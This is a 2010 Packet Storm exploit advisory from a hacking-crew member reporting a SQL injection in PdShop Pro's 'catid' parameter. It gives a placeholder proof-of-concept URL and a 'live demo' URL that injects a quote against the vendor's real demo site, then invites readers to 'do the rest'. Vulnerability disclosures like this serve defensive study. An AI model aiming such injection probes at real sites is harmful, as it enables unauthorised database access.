PdShop Pro Online Store System SQL Injection

2010-09-29T00:00:00
ID PACKETSTORM:94349
Type packetstorm
Reporter RoAd_KiLlEr
Modified 2010-09-29T00:00:00

Description

                                        
                                            `-----------------------------------------------------------------------------------------  
PdShop pro Online Store System. SQL-i Vulnerability  
-----------------------------------------------------------------------------------------  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ########################################### 1  
0 I'm **RoAd_KiLlEr** member from Inj3ct0r Team 1  
1 ########################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
[+]Title PdShop pro Online Store System. SQL-i Vulnerability  
[+]Author **RoAd_KiLlEr**  
[+]Contact RoAd_KiLlEr[at]Khg-Crew[dot]Ws  
[+]Tested on Win Xp Sp 2/3  
---------------------------------------------------------------------------  
[~] Founded by **RoAd_KiLlEr**  
[~] Team: Albanian Hacking Crew  
[~] Home: http://inj3ct0r.com/author/2447   
[~] Version: ALl Versions are vulnerable  
[~] Price: $199  
[~] Vendor: http://www.pagedowntech.com/products/  
==========ExPl0iT3d by **RoAd_KiLlEr**==========  
  
[+]Description:  
PageDown Technology has released the Plus Edition of PDshopPro, our ASP online store application. It features Unlimited categories, subcategories, items, featured items, Inventory/Stock control, order status, password recovery, email notifications, order confirmations, and more. The built-in HTML editor allows for full formatting control. Compatible with the popular payment processors.  
  
=========================================  
  
  
  
[+]. SQL-i Vulnerability  
=+=+=+=+=+=+=+=+=  
  
  
[P0C]: http://127.0.0.1/shop/category.aspx?catid=[SQL Injection]  
  
  
  
[L!ve Dem0]: http://demo3.pdshop.net/shop/category.aspx?catid='17  
  
  
  
You got an errorr. :)  
So its vulnerable,you try do the rest ... :P  
  
  
  
===========================================================================================  
[!] Albanian Hacking Crew   
===========================================================================================  
[!] **RoAd_KiLlEr**   
===========================================================================================  
[!] MaiL: sukihack[at]gmail[dot]com  
===========================================================================================  
[!] Greetz To : Ton![w]indowS | X-n3t | The|DennY` | EaglE EyE | THE_1NV1S1BL3 & All Albanian/Kosova Hackers   
===========================================================================================  
[!] Spec Th4nks: r0073r | indoushka | Sid3^effects| L0rd CruSad3r | SONIC | MaFFiTeRRoR | All Inj3ct0r.com Members | All Staff from techc0de.com  
===========================================================================================  
[!] Red n'black i dress eagle on my chest  
It's good to be an ALBANIAN  
Keep my head up high for that flag I die  
Im proud to be an ALBANIAN  
===========================================================================================  
`